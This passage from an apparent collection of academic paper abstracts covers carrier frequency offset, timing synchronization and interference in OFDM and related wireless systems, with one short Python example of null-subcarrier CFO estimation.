OFDM. We first present our channel model, and then undertake an analysis of OFDM systems under off-tone jamming attacks, verifying the idea through simulation. Both analysis and simulation show that off-tone jamming attacks have more adverse effect than jammer aligned with the received signal. --- paper_title: A Novel Doppler Frequency Offset Estimation Method for DVB-T System in HST Environment paper_content: A novel Doppler frequency offset estimation method is proposed for the digital video broadcasting-terrestrial (DVB-T) system in the high-speed-train (HST) environment. Based on the analysis of the effect of the scattered components of the wireless channel on the accuracy of the Doppler frequency offset estimation, we separate the path with the Line-of-Sight(LOS) component from the multipath channel, and only use it to estimate the frequency offset caused by Doppler shift. Simulation results show that the mean square error (MSE) of the proposed scheme is far better than those of the available schemes. --- paper_title: SIR Analysis for OFDM Transmission in the Presence of CFO, Phase Noise and Doubly Selective Fading paper_content: This paper presents an analysis of the detrimental effects of carrier frequency offset (CFO), phase noise (PHN) and doubly-selective fading on orthogonal frequency division multiplexing (OFDM) transmission performance. 
In particular, we derive a closed-form expression for the signal-to-interference ratio (SIR) at an OFDM receiver in the presence of CFO, PHN and doubly-selective fading. Simulation and analytical results under various OFDM system settings are in good agreement and reveal the contributions of these channel impairments to the SIR degradation. --- paper_title: Iterative Timing Recovery with Turbo Decoding at Very Low SNRs paper_content: Turbo codes are near-Shannon-limit channel codes widely used in space communication systems and other applications operating at low signal-to-noise ratio (SNR). Timing recovery is one of the key technologies for these systems to work effectively. In this paper, an efficient iterative timing recovery scheme with Turbo decoding is presented. By maximizing the sum of the squared soft decision metrics from Turbo decoding, it achieves accurate timing acquisition. A computationally efficient approximate gradient descent method is adopted to obtain a rough estimate of the timing offset. Another merit is that, with the proposed method, a rate-1/6 Turbo-coded binary phase shift keying (BPSK) system can work at a very low SNR (Es/N0) of about -7.44 dB without any pilot symbol. Finally, the complete timing recovery scheme combines the proposed method with Mueller-Muller (M&M) timing recovery, which performs the timing tracking. Simulation results indicate that the Turbo-coded BPSK system with rather large timing errors can, using the proposed scheme, achieve performance within 0.1 dB of the ideal code with reasonable computation and storage. --- paper_title: Simplified Multiaccess Interference Reduction for MC-CDMA With Carrier Frequency Offsets paper_content: Multicarrier code-division multiple-access (MC-CDMA) system performance can be severely degraded by multiaccess interference (MAI) due to the carrier frequency offset (CFO). We argue that MAI can more easily be reduced by employing complex carrier interferometry (CI) codes. We consider the scenario with spread gain N, multipath length L, and N users, i.e., a fully loaded system. It is proved that, when CI codes are used, each user only needs to combat 2(L - 1) (rather than N - 1) interferers, even in the presence of CFO. It is shown that this property of MC-CDMA with CI codes in a CFO channel can be exploited to simplify three multiuser detectors, namely, parallel interference cancellation (PIC), maximum-likelihood, and decorrelating multiuser detectors. The bit-error probability (BEP) for MC-CDMA with binary phase-shift keying (BPSK) modulation and single-stage PIC and an upper bound for the minimum error probability are derived. Finally, simulation results are given to corroborate the theoretical results. --- paper_title: Interference Analysis in Time and Frequency Asynchronous Network MIMO OFDM Systems paper_content: It is well known that symbol timing offsets larger than the cyclic prefix, as well as carrier frequency offsets between transmitter and receiver stations, destroy the orthogonality among OFDM subcarriers and induce additional interference. In conjunction with MIMO transmission over frequency selective fading channels where different users interfere with each other, these effects strongly degrade the signal detection performance. In this paper we consider fully asynchronous spatially multiplexed transmission with different symbol timing and carrier frequency offsets on each transmitter-receiver link, as they appear in distributed MIMO systems with multiple users and base stations.
We derive a factorized system model for signal transmission in frequency domain where the different effects of inter-carrier, inter-symbol and inter-block interference are separated and analyzed in terms of signal-to-interference-noise-ratio degradation. Finally, we evaluate the interference levels at a receiver station for different link-level as well as system-level simulation setups. --- paper_title: Physical-Layer Network Coding Using FSK Modulation under Frequency Offset paper_content: Physical-layer network coding is a protocol capable of increasing throughput over conventional relaying in the two- way relay channel, but is sensitive to phase and frequency offsets among transmitted signals. Modulation techniques which require no phase synchronization such as noncoherent FSK can compensate for phase offset, however, the relay receiver must still compensate for frequency offset. In this work, a soft- output noncoherent detector for the relay is derived, under the assumption that the source oscillators generating FSK tones lack frequency synchronization. The derived detector is shown through simulation to improve error rate performance over a conventional detector which does not model offset, for offset values on the order of a few hundredths of a fraction of FSK tone spacing. --- paper_title: A New ML Detector for SIMO Systems with Imperfect Channel and Carrier Frequency Offset Estimation paper_content: The objective of this paper is to develop a new detection algorithm for single input multiple output (SIMO) systems, using maximum likelihood (ML) scheme. The proposed method takes into account both channel and carrier frequency offset (CFO) estimation errors for detection of the transmitted data. Simulation results show that the new algorithm improve performance in the presence of multiple estimation error variances as compared to the conventional method for different modulation schemes. --- paper_title: A Novel Effective ICI Self-Cancellation Method paper_content: Orthogonal Frequency Division Multiplexing (OFDM) systems may suffer from both carrier frequency offset (CFO) and in-phase/quadrature-phase (I/Q) imbalance at the receiver front end. In this paper, a novel type of intercarrier interference (ICI) self-cancellation method using mirror mapping is proposed to combat these impairment. Based on the proposed novel method and by adopting two widely used mapping operations, we altogether derive two different mirror mapping schemes. Analysis and simulation results verify that the proposed mirror mapping schemes not only inherit the efficiency of the existing self-cancellation schemes in suppressing ICI caused by CFO but also have the ability of compressing or even eliminating IQ imbalance. --- paper_title: Synchronization for TDS-OFDM over multipath fading channels paper_content: Time domain synchronous orthogonal frequency division multiplex (TDS-OFDM) is an effective multi-carrier modulation scheme to improve the spectrum efficiency. However, conventional synchronization algorithm based on the correlation property of the time-domain pseudo-noise (PN) sequence may not work well over severe multipath fading channels when large carrier frequency offset (CFO) exits. In this paper, a robust synchronization algorithm is proposed where the PN sequence in the frame head is considered as a cyclic prefix (CP) OFDM training symbol. 
The time-domain slide auto-correlation based on the cyclic structure of the PN sequence is adopted for timing and fine CFO estimation, while in the frequency domain, a differential correlation is applied for large CFO estimation. Simulations demonstrate that the proposed method could achieve the satisfactory performance over multipath fading channels. In addition, to reduce the implementation complexity, the frame head of the TDS-OFDM system is preferred to be binary PN sequences in the frequency domain with cyclic structure in the time domain. --- paper_title: Blind carrier frequency offset estimation for tile-based orthogonal frequency division multiple access uplink with multi-antenna receiver paper_content: In this study, the authors propose a blind carrier frequency offset (CFO) estimation method for the tile structure orthogonal frequency division multiple access (OFDMA) uplink with multi-antenna receiver. They employ an iterative approach to extract the signal component for each user gradually and propose a carefully designed CFO estimator to update the CFO estimate during the iterative procedure. The key ingredient of the proposed method is using few subcarriers on both sides within each tile as the ‘guard subcarriers’, which can greatly mitigate the effect of multi-user interference. The proposed method supports not only fully loaded transmissions, but also the generalised assignment scheme that provides the flexibility for dynamical resource allocation. The numerical results are provided, which indicate that the proposed method can almost converge to the analytical lower bound within a few iterative cycles. It is seen that the proposed method also outperforms the existing competitor with multi-antenna receiver in terms of estimation performance, especially with few adopted blocks. --- paper_title: Estimation, Training, and Effect of Timing Offsets in Distributed Cooperative Networks paper_content: Successful collaboration in cooperative networks require accurate estimation of multiple timing offsets. When combined with signal processing algorithms the estimated timing offsets can be applied to mitigate the resulting inter-symbol interference (ISI). This paper seeks to address timing synchronization in distributed multi-relay amplify-and-forward (AF) and decode-and-forward (DF) relaying networks, where timing offset estimation using a training sequence is analyzed. First, training sequence design guidelines are presented that are shown to result in improved estimation performance. Next, two iterative estimators are derived that can determine multiple timing offsets at the destination. The proposed estimators have a considerably lower computational complexity while numerical results demonstrate that they are accurate and reach or approach the Cramer-Rao lower bound (CRLB). --- paper_title: Timing and Carrier Synchronization With Channel Estimation in Multi-Relay Cooperative Networks paper_content: Multiple distributed nodes in cooperative networks generally are subject to multiple carrier frequency offsets (MCFOs) and multiple timing offsets (MTOs), which result in time varying channels and erroneous decoding. This paper seeks to develop estimation and detection algorithms that enable cooperative communications for both decode-and-forward (DF) and amplify-and-forward (AF) relaying networks in the presence of MCFOs, MTOs, and unknown channel gains. A novel transceiver structure at the relays for achieving synchronization in AF-relaying networks is proposed. 
New exact closed-form expressions for the Cramer-Rao lower bounds (CRLBs) for the multi-parameter estimation problem are derived. Next, two iterative algorithms based on the expectation conditional maximization (ECM) and space-alternating generalized expectation-maximization (SAGE) algorithms are proposed for jointly estimating MCFOs, MTOs, and channel gains at the destination. Though the global convergence of the proposed ECM and SAGE estimators cannot be shown analytically, numerical simulations indicate that through appropriate initialization the proposed algorithms can estimate channel and synchronization impairments in a few iterations. Finally, a maximum likelihood (ML) decoder is devised for decoding the received signal at the destination in the presence of MCFOs and MTOs. Simulation results show that through the application of the proposed estimation and decoding methods, cooperative systems result in significant performance gains even in presence of impairments. --- paper_title: Frequency estimation of single tone signals with bit transition paper_content: Frequency estimation of a single tone signal is important in many applications. In this study, a frequency estimation algorithm is proposed for single tone signals modulated with unknown data. The proposed unbiased frequency estimator (UFE) uses discrete Fourier transform (DFT) coefficients to calculate the accurate frequency offset. To achieve better performance in a noisy environment, a biased frequency estimator (BFE) is obtained by applying trigonometric approximation to UFE. The Taylor expansion of BFE is also proposed to meet the computational complexity requirement in some real-time applications. The performance of the proposed algorithm is evaluated through Monte Carlo simulations, compared with conventional interpolated DFT-based algorithm and typical non-data-aided frequency estimation algorithm. --- paper_title: Quasi-maximum likelihood initial downlink synchronization for IEEE 802.16m paper_content: We consider initial downlink synchronization for the emerging IEEE 802.16m standard. Such synchronization involves estimation of the carrier frequency offset, signal timing, and the index of “Primary Advanced Preamble” (PA-Preamble) over a multipath channel. We first give a brief overview of some relevant signal properties in IEEE 802.16m. These properties are rather different from other recent standards to the point of needing a new synchronization algorithm. We develop a synchronization method based on the maximum likelihood (ML) principle. It turns out that the multipath channel response is also estimated along the way. The resulting method is considered quasi-ML because some approximations are used to simplify computation. Simulation results are presented to illustrate its performance. --- paper_title: Are SC-FDE Systems Robust to CFO? paper_content: This paper investigates the impact of carrier frequency offset (CFO) on Single Carrier wireless communication systems with Frequency Domain Equalization (SC-FDE). We show that CFO in SC-FDE systems causes irrecoverable channel estimation error, which leads to inter-symbol-interference (ISI). The impact of CFO on SC-FDE and OFDM is compared in the presence of CFO and channel estimation errors. Closed form expressions of signal to interference and noise ratio (SINR) are derived for both systems, and verified by simulation results. We find that when channel estimation errors are considered, SC-FDE is similarly or even more sensitive to CFO, compared to OFDM. 
In particular, in SC-FDE systems, CFO mainly deteriorates the system performance via degrading the channel estimation. Both analytical and simulation results highlight the importance of accurate CFO estimation in SC-FDE systems. --- paper_title: Joint Carrier Frequency Offset and Channel Estimation for OFDM Systems via the EM Algorithm in the Presence of Very High Mobility paper_content: In this paper, the problem of joint carrier frequency offset (CFO) and channel estimation for OFDM systems over the fast time-varying frequency-selective channel is explored within the framework of the expectation-maximization (EM) algorithm and parametric channel model. Assuming that the path delays are known, a novel iterative pilot-aided algorithm for joint estimation of the multipath Rayleigh channel complex gains (CG) and the carrier frequency offset (CFO) is introduced. Each CG time-variation, within one OFDM symbol, is approximated by a basis expansion model (BEM) representation. An autoregressive (AR) model is built to statistically characterize the variations of the BEM coefficients across the OFDM blocks. In addition to the algorithm, the derivation of the hybrid Cramer-Rao bound (HCRB) for CFO and CGs estimation in our context of very high mobility is provided. We show that the proposed EM has a lower computational complexity than the optimum maximum a posteriori estimator and yet incurs only an insignificant loss in performance. --- paper_title: Timing, Carrier, and Frame Synchronization of Burst-Mode CPM paper_content: In this paper, we propose a complete synchronization algorithm for continuous phase modulation (CPM) signals in burst-mode transmission over additive white Gaussian noise (AWGN) channels. The timing and carrier recovery are performed through a data-aided (DA) maximum likelihood algorithm, which jointly estimates symbol timing, carrier phase, and frequency offsets based on an optimized synchronization preamble. Our algorithm estimates the frequency offset via a one-dimensional grid search, after which symbol timing and carrier phase are computed via simple closed-form expressions. The mean-square error (MSE) of the algorithm's estimates reveals that it performs very close to the theoretical Cramer-Rao bound (CRB) for various CPMs at signal-to-noise ratios (SNRs) as low as 0 dB. Furthermore, we present a frame synchronization algorithm that detects the arrival of bursts and estimates the start-of-signal. We simulate the performance of the frame synchronization algorithm along with the timing and carrier recovery algorithm. The bit error rate results demonstrate near ideal synchronization performance for low SNRs and short preambles. --- paper_title: Decentralised ranging method for orthogonal frequency division multiple access systems with amplify-and-forward relays paper_content: In this study, a decentralised ranging method for uplink orthogonal frequency division multiple access (OFDMA) systems with half-duplex (HD) amplify-and-forward (AF) relay stations (RSs) is proposed. In the OFDMA systems with HD AF RSs, twice more resources and delays are required as ranging without RS. To reduce the required resources and delays for ranging, the authors propose a two-phase ranging scheme based on the decentralised timing-offset estimation at each ranging mobile station (MS). At the first phase, RS occasionally broadcasts timing reference signal, and at the second phase RS retransmits the collected ranging signals from the MSs. 
Then, each ranging MS can individually estimate its own timing offset from the received signals. In the proposed ranging method, the base station does not need to send a timing-adjustment message, and the overhead associated with ranging in the downlink resources and the computational complexity can be significantly reduced without degrading the timing-offset-estimation performance. Moreover, the delay associated with ranging remains the same as for ranging without an RS. --- paper_title: Maximum Likelihood Frequency Estimation and Preamble Identification in OFDMA-based WiMAX Systems paper_content: In multi-cellular WiMAX systems based on orthogonal frequency-division multiple-access (OFDMA), the training preamble is chosen from a set of known sequences so as to univocally identify the transmitting base station. Therefore, in addition to timing and frequency synchronization, preamble index identification is another fundamental task that a mobile terminal must successfully complete before establishing a communication link with the base station. In this work we investigate the joint maximum likelihood (ML) estimation of the carrier frequency offset (CFO) and preamble index in a multicarrier system compliant with the WiMAX specifications, and derive a novel expression of the relevant Cramer-Rao bound (CRB). Since the exact ML solution is prohibitively complex in its general formulation, suboptimal algorithms are developed which can provide a reasonable trade-off between estimation accuracy and processing load. Specifically, we show that the fractional CFO can be recovered by combining the ML estimator with an existing algorithm that attains the CRB in all practical scenarios. The integral CFO and preamble index are subsequently retrieved by a suitable approximation of their joint ML estimator. Compared to existing alternatives, the resulting scheme exhibits improved accuracy and reduced sensitivity to residual timing errors. The price for these advantages is a certain increase of the system complexity. --- paper_title: Bounds and Algorithms for Multiple Frequency Offset Estimation in Cooperative Networks paper_content: The distributed nature of cooperative networks may result in multiple carrier frequency offsets (CFOs), which make the channels time varying and overshadow the diversity gains promised by collaborative communications. This paper seeks to address multiple CFO estimation using training sequences in space-division multiple access (SDMA) cooperative networks. The system model and CFO estimation problem for cases of both decode-and-forward (DF) and amplify-and-forward (AF) relaying are formulated and new closed-form expressions for the Cramer-Rao lower bound (CRLB) for both protocols are derived. The CRLBs are then applied in a novel way to formulate training sequence design guidelines and determine the effect of network protocol and topology on CFO estimation. Next, two computationally efficient iterative estimators are proposed that determine the CFOs from multiple simultaneously relaying nodes. The proposed algorithms reduce multiple CFO estimation complexity without sacrificing bandwidth and training performance. Unlike existing multiple CFO estimators, the proposed estimators are also accurate for both large and small CFO values. Numerical results show that the new methods outperform existing algorithms and reach or approach the CRLB at mid-to-high signal-to-noise ratio (SNR).
When applied to system compensation, simulation results show that the proposed estimators significantly reduce average-bit-error-rate (ABER). --- paper_title: Space-time coding for time and frequency asynchronous CoMP transmissions paper_content: This paper deals with time and frequency offset in coordinated multipoint (CoMP) transmission/reception networks by using distributed linear convolutional space-time coding (DLC-STC). We first prove that perfect time synchronization is impractical for CoMP transmission/reception networks. Then the DLC-STC scheme, in which exact time synchronization at the relay nodes is unnecessary, is proposed for the CoMP joint processing mode (CoMP-JP). Finally, we show the detecting method by minimum mean-squared error decision-feedback equalizer (MMSE-DFE) receivers with any frequency offsets. Simulation results show that with MMSE-DFE receivers, the proposed DLC-STC scheme outperforms the delay diversity scheme and the MMSE-DFE receivers can achieve the same diversity orders as the maximum likelihood sequence detection (MLSD) receivers. --- paper_title: Low Complexity Pilot Assisted Carrier Frequency Offset Estimation for OFDMA Uplink Systems paper_content: In this letter, we propose a low complexity pilot aided carrier frequency offset (CFO) estimation algorithm for orthogonal frequency division multiplexing access (OFDMA) uplink systems based on two consecutive received OFDMA symbols. Assuming that the channels and the CFOs are static over the two consecutive symbols, we express the second received OFDMA symbol in terms of the CFOs and the first OFDMA symbol. Based on this signal model, a new estimation algorithm which obtains the CFOs by minimizing the mean square distance between the received OFDMA symbol and its regenerated signal is provided. Also, we implement the proposed algorithm via fast Fourier transform (FFT) operations by utilizing the block matrix inversion lemma and the conjugate gradient method. Simulation results show that the proposed algorithm approaches the average Cramer Rao bound for moderate and high signal to noise ratio (SNR) regions. Moreover, the algorithm can be applied for any carrier assignment schemes with low complexity. --- paper_title: Preamble Design Using Embedded Signaling for OFDM Broadcast Systems Based on Reduced-Complexity Distance Detection paper_content: The second-generation digital terrestrial television broadcasting standard adopts the so-called P1 symbol as the preamble for initial synchronization. The P1 symbol also carries a number of basic transmission parameters, including the fast Fourier transform size and the single-input/single-output as well as multiple-input/single-output mode, to appropriately configure the receiver for carrying out the subsequent processing. In this paper, an improved preamble design is proposed, where a pair of training sequences is inserted in the frequency domain, and their distance is used for transmission parameter signaling. At the receiver, only a low-complexity correlator is required for the detection of the signaling. Both the coarse carrier frequency offset and the signaling can simultaneously be estimated by detecting the aforementioned correlation. Compared with the standardized P1 symbol, the proposed preamble design significantly reduces the complexity of the receiver while retaining high robustness in frequency-selective fading channels. 
Furthermore, we demonstrate that the proposed preamble design achieves better signaling performance than the standardized P1 symbol despite reducing the numbers of multiplications and additions by about 40% and 20%, respectively. --- paper_title: Challenges in Reconfigurable Radio Transceivers and Application of Nonlinear Signal Processing for RF Impairment Mitigation paper_content: The design of compact and reconfigurable radio transceivers with low power consumption and low cost is a challenging task in future wireless communications systems. Transceiver architectures that are amenable to high-level integration will inevitably suffer from various radio frequency (RF) impairments, which limit the communications system performance and hence hinder their widespread use in commercial products. In this paper, we present the mitigation of RF impairments as a system identification problem. Four major classes of RF impairments are presented: power amplifier (PA) nonlinearity, in-phase/quadrature (I/Q) impairments, group delay distortion, and carrier frequency offset and phase noise. Their models and up-to-date identification techniques are described here. In particular, various nonlinear signal processing techniques that are effective in mitigating these impairments are also presented here. Theoretical and experimental results show that these mitigation techniques can significantly improve the communications system performance. --- paper_title: H-inf channel estimation for MIMO-OFDM systems in the presence of carrier frequency offset paper_content: An H-infinity (H-inf) channel estimation algorithm is proposed for estimating the channels in MIMO-OFDM systems in the presence of carrier frequency offset (CFO). The goal is to develop an algorithm with low complexity, good estimation performance, and better suppression of CFO. For this purpose, the H-inf estimator with a simplified objective function is first developed, and then, its computational load is reduced by using the iterative expectation maximization (EM) process. To resist the CFO, we derive a precise equivalent signal model (ESM) to identify the channels. It is observed that the H-inf estimator could be regarded as a substitute for the optimal maximum a posteriori (MAP) estimator, but with much less complexity. At the same time, by using the ESM, the performance degradation caused by CFO is remarkably reduced. --- paper_title: Joint estimation of CFO and receiver I/Q imbalance using virtual subcarriers for OFDM systems paper_content: In this paper, we study the estimation of carrier frequency offset (CFO) in the presence of the receiver in-phase and quadrature-phase (I/Q) imbalance for orthogonal frequency division multiplexing (OFDM) systems. By minimizing the energy of the samples on the virtual subcarriers, our proposed algorithm can jointly estimate the CFO and I/Q parameters using one OFDM block. When the CFO is small, a closed-form solution can be obtained. Simulation results show that our proposed method can provide good performance for both the I/Q and CFO estimation and it compares favorably with a recent method.
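As an illustration of the null-subcarrier idea used in the preceding entry, the following minimal Python sketch estimates a CFO by de-rotating one received OFDM block with a set of trial offsets and keeping the offset that leaves the least energy on the known virtual subcarriers. The subcarrier layout, candidate grid, and function names are illustrative assumptions, and the receiver I/Q imbalance treated in the paper is ignored here.

import numpy as np

def cfo_by_null_subcarrier_search(r, null_bins, candidates):
    """Grid-search CFO estimate: pick the trial offset whose correction
    leaves the least energy on the known null (virtual) subcarriers."""
    N = len(r)
    n = np.arange(N)
    best_eps, best_cost = None, np.inf
    for eps in candidates:
        corrected = r * np.exp(-2j * np.pi * eps * n / N)   # undo trial CFO
        spectrum = np.fft.fft(corrected)
        cost = np.sum(np.abs(spectrum[null_bins]) ** 2)     # leakage onto nulls
        if cost < best_cost:
            best_eps, best_cost = eps, cost
    return best_eps

# toy check: one OFDM block with nulls in the middle of the band and a CFO of 0.23 bins
N = 64
null_bins = np.r_[0, np.arange(27, 38)]                      # assumed null layout
data_bins = np.setdiff1d(np.arange(N), null_bins)
X = np.zeros(N, complex)
X[data_bins] = np.random.choice([1+1j, 1-1j, -1+1j, -1-1j], data_bins.size)
x = np.fft.ifft(X)
true_eps = 0.23
r = x * np.exp(2j * np.pi * true_eps * np.arange(N) / N)
est = cfo_by_null_subcarrier_search(r, null_bins, np.linspace(-0.5, 0.5, 201))
print(round(est, 2))   # close to 0.23 in the noiseless case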
--- paper_title: A Low Complexity Equalization Method for Cooperative Communication Systems Based on Distributed Frequency-Domain Linear Convolutive Space-Frequency Codes paper_content: In this paper, we consider the cooperative communication system based on distributed frequency-domain linear convolutive space-frequency codes (FLC-SFC) with multiple carrier frequency offsets (CFOs) when the channels from relay nodes to destination node are flat fading. Through the mathematical derivation, the cooperative system model is simplified. Then, the equivalent banded system model is obtained and the related analysis shows the banded property of the equivalent channel matrix. Furthermore, a banded block minimum mean square error (MMSE) equalization method applying LDLH matrix decomposition is proposed for the banded system model. Besides, a special class of mask matrix is utilized to realize the banded operation. Compared with the traditional MMSE equalization method, the proposed equalization method has a relatively low computational complexity with satisfactory system performance. --- paper_title: Multiplication-Free Estimation of Integer Frequency Offset for OFDM-Based DRM Systems paper_content: This letter proposes a low complexity integer frequency offset (IFO) estimation scheme in an orthogonal frequency division multiplexing (OFDM) based digital radio mondiale plus (DRM+) system with nonuniform phased pilot symbols. To reduce the computational complexity, the pilot symbols used for frequency estimation in the DRM+ system are partitioned into a number of pilot subsets, and pilots in each subset are phase-rotated to have a unique phase so that the estimator is made computationally efficient. --- paper_title: Timing and Frequency Synchronization for Cooperative Relay Networks paper_content: This paper deals with timing and frequency synchronization in multi-relay cooperative networks operating with both large and small carrier frequency offset (CFO) over frequency-selective channels. A novel preamble based on constant amplitude zero auto-correlation (CAZAC) sequence is proposed, and a corresponding practical multistage scheme is presented. Joint timing and integral frequency synchronization is involved to resist multi-relay interference (MRI). Then, fractional frequency estimation is carried out, and fine timing estimation completes the synchronization scheme. The performance is evaluated in terms of the mean square error (MSE). Simulation results show that the method is robust under both flat-fading and multipath fading channels, and provides accurate estimation results in the presence of both large and small multiple CFO values. --- paper_title: Ultra-Wideband TOA Estimation in the Presence of Clock Frequency Offset paper_content: The paper is concerned with the impact of clock frequency offsets on the accuracy of ranging systems based on time of arrival (TOA) measurements. It is shown that large TOA errors are incurred if the transmitter and receiver clocks are mistuned by more than just one part per million (ppm). This represents a serious obstacle to the use of commercial low-cost quartz oscillators, as they exhibit frequency drifts in the range of ± 10 ppm and more. A solution is to estimate first the transmitter clock frequency relative to the receiver's and then compensate for the difference by acting on the receiver clock tuning. An algorithm is proposed that estimates the transmitter clock frequency with an accuracy better than 0.1 ppm. 
Computer simulations indicate that its use in ranging systems makes TOA measurements as good as those obtained with perfectly synchronous clocks. --- paper_title: Joint Maximum Likelihood Estimation of Carrier and Sampling Frequency Offsets for OFDM Systems paper_content: In orthogonal-frequency division multiplexing (OFDM) systems, carrier and sampling frequency offsets (CFO and SFO, respectively) can destroy the orthogonality of the subcarriers and degrade system performance. In the literature, Nguyen-Le, Le-Ngoc, and Ko proposed a simple maximum-likelihood (ML) scheme using two long training symbols for estimating the initial CFO and SFO of a recursive least-squares (RLS) estimation scheme. However, the results of Nguyen-Le's ML estimation show poor performance relative to the Cramer-Rao bound (CRB). In this paper, we extend Moose's CFO estimation algorithm to joint ML estimation of CFO and SFO using two long training symbols. In particular, we derive CRBs for the mean square errors (MSEs) of CFO and SFO estimation. Simulation results show that the proposed ML scheme provides better performance than Nguyen-Le's ML scheme. --- paper_title: Coordinated Multi-Cell Systems: Carrier Frequency Offset Estimation and Correction paper_content: We consider a coordinated multi-cell (CMC) system and the associated problem of independent carrier frequency offsets (CFOs) at the basestations (BSs). These BS CFOs cause accumulated phase errors that compromise downlink beamforming accuracy, and consequently degrade the spectral efficiency of the CMC system. Since the inherent structure of coordinated downlink beamforming techniques makes it impossible to correct for the BS CFOs at the mobile subscriber (MS), our topic is estimation and correction of the BS CFOs at the BSs. Our method begins with the formation of MS-side estimates of the BS CFOs, which are then fed back to the coordinated BSs. We then derive an optimum maximum likelihood (ML) estimator for the BS CFOs that uses independent MS-side CFO estimates and average channel signal-to-noise ratios. However, it is demonstrated that the CFOs of the MSs themselves introduce a bias to the optimal BS CFO estimator. To compensate for this bias, a joint BS and MS CFO estimator is derived, but shown both to require high computation and have rank deficiency. This motivates an improved technique that removes the rank problem and employs successive estimation to reduce computation. It is demonstrated to overcome the MS CFO bias and efficiently solve the joint BS and MS CFO problem in systems that have low to moderate shadowing. We term the full BS CFO estimation and correction procedure "BS CFO tightening". --- paper_title: Total Inter-Carrier Interference Cancellation for MC-CDMA System in Mobile Environment paper_content: Multi-carrier code division multiple access (MC-CDMA)has been considered as a strong candidate for next generation wireless communication system due to its excellent performance in multi-path fading channel and simple receiver structure. However, like all the multi-carrier transmission technologies such as OFDM, the inter-carrier interference (ICI) produced by the frequency offset between the transmitter and receiver local oscillators or by Doppler shift due to high mobility causes significant BER (bit error rate) performance degradation in MC-CDMA system. 
Many ICI cancellation methods such as windowing and frequency domain coding have been proposed in the literature to cancel ICI and improve the BER performance for multi-carrier transmission technologies. However, existing ICI cancellation methods do not cancel ICI entirely and the BER performance after ICI cancellation is still much worse than the BER performance of original system without ICI. Moreover, popular ICI cancellation methods like ICI self-cancellation reduce ICI at the price of lowering the transmission rate and reducing the bandwidth efficiency. Other frequency-domain coding methods do not reduce the data rate, but produce less reduction in ICI as well. In this paper, we propose a novel ICI cancellation scheme that can eliminate the ICI entirely and offer a MC-CDMA mobile system with the same BER performance of a MC-CDMA system without ICI. More importantly, the proposed ICI cancellation scheme (namely Total ICI Cancellation) does not lower the transmission rate or reduce the bandwidth efficiency. Specifically, by exploiting frequency offset quantization, the proposed scheme takes advantage of the orthogonality of the ICI matrix and offers perfect ICI cancellation and significant BER improvement at linearly growing cost. Simulation results in AWGN channel and multi-path fading channel confirm the excellent performance of the proposed Total ICI Cancellation scheme in the presence of frequency offset or time variations in the channel, outperforming existing ICI cancellation methods. --- paper_title: Wide-range frequency offset estimation method for a DD-OFDM-PON downstream system paper_content: We propose a wide-range frequency offset estimation algorithm used in a direct detection orthogonal frequency division multiplexing passive optical network (DD-OFDM-PON) downstream system. Using this method, frequency offset is estimated according to the spectrum of the received DD-OFDM signal. The estimated frequency offset is used for frequency down-conversion in the digital domain to obtain the baseband OFDM signal. With this method, all data-bearing subcarriers should fall into the OFDM bandwidth after frequency down-conversion. The validity of the method is confirmed by an experiment with 20 Gb/s OFDM-PON downstream transmission. --- paper_title: Coarse frame synchronization for OFDM systems using SNR estimation paper_content: In wireless orthogonal frequency division multiplexing (OFDM) systems, coarse frame synchronization and signal-to-noise ratio (SNR) values are two crucial parameters for OFDM receivers. In this paper, we develop a coarse timing estimator to overcome the plateau phenomenon by using delayed correlation between two estimated SNR values. The training symbol is designed for multiple pieces instead of two parts to mitigate the Doppler effect for SNR estimation. Compared with the Minn's scheme, our proposed scheme has smaller estimation variance both in EVA and ETU channels, which can also provide an estimated SNR value in the time domain. The obtained SNR value can be further reused to carrier frequency offset (CFO) estimation or decoding for system performance improvement. --- paper_title: High resolution range profile analysis based on multicarrier phase-coded waveforms of OFDM radar paper_content: Orthogonal frequency division multiplexing (OFDM) radar with multicarrier phase-coded waveforms has been recently introduced to achieve high range resolution. The conventional method for obtaining the high resolution range profile (HRRP) is based on matched filters. 
A method of synthesizing HRRP based on the fast Fourier transform (FFT) and decoding is proposed. The mathematical expressions of HRRP are derived by assuming an elementary scenario of point-scattering targets. Based on the characteristic of OFDM multicarrier signals, it mainly analyzes the influence on HRRP exerted by several factors, such as velocity compensation errors, the sampling frequency offset, and so on. The conclusions are significant for the design of the OFDM imaging radar. Finally, the simulation results demonstrate the validity of the conclusions. --- paper_title: Robust Timing Estimation Method for OFDM Systems With Reduced Complexity paper_content: As a modification of Hamed and Mahrokh's (HM) method, a preamble based timing offset estimation method for orthogonal frequency division multiplexing (OFDM) systems is presented. To make the estimator simpler in computation and keep its immunity to carrier frequency offset (CFO), the local autocorrelation sequence of the known preamble is mapped into an elaborately simplified one. The performance of the proposed estimator is evaluated by mean square error (MSE). Computer simulations under three different Rayleigh fading channels show that the proposed method achieves the same performance as HM's method with only half of its computational complexity. --- paper_title: Time and frequency synchronisation scheme for orthogonal frequency division multiplexing-based cooperative systems paper_content: In the cooperative relay system, different frames from different relays are not aligned in the time domain, and have different carrier frequency offsets (CFOs). Estimation of these timing offsets and CFOs is a crucial and challenging task. In this study, a new training structure is proposed, and a novel time and frequency synchronisation scheme is presented for orthogonal frequency division multiplexing-based (OFDM-based) cooperative systems. The coarse time synchronisation is accomplished by using the symmetric conjugate of the training symbol and the fine time synchronisation is accomplished by segment-moving correlation. The fractional frequency offset is estimated by using the phase difference of the received signal and the integral frequency offset is estimated by utilising the good autocorrelation of the training symbol in frequency domain. The analysis and the simulation results show that, compared with the traditional scheme, the proposed scheme has better timing and frequency offset estimation performance and lower complexity for OFDM-based cooperative systems. --- paper_title: Improved least squares channel estimation for orthogonal frequency division multiplexing paper_content: The authors consider the design of pilot sequences for channel estimation in the presence of carrier frequency offset (CFO) in systems that employ orthogonal frequency division multiplexing (OFDM). The CFO introduces intercarrier interference (ICI) which degrades the accuracy of the channel estimation. In order to minimise this effect, the authors design pilot sequence that minimises the mean square error (MSE) of the modified least squares (mLS) channel estimator. Since the identical pilot sequence, which minimises this MSE, has high peak-to-average power ratio of the OFDM signal, an alternative approach is proposed for channel estimation. The authors first introduce a new estimator as an alternative to the mLS estimator and design a low PAPR pilot sequences tailored to this new estimator. 
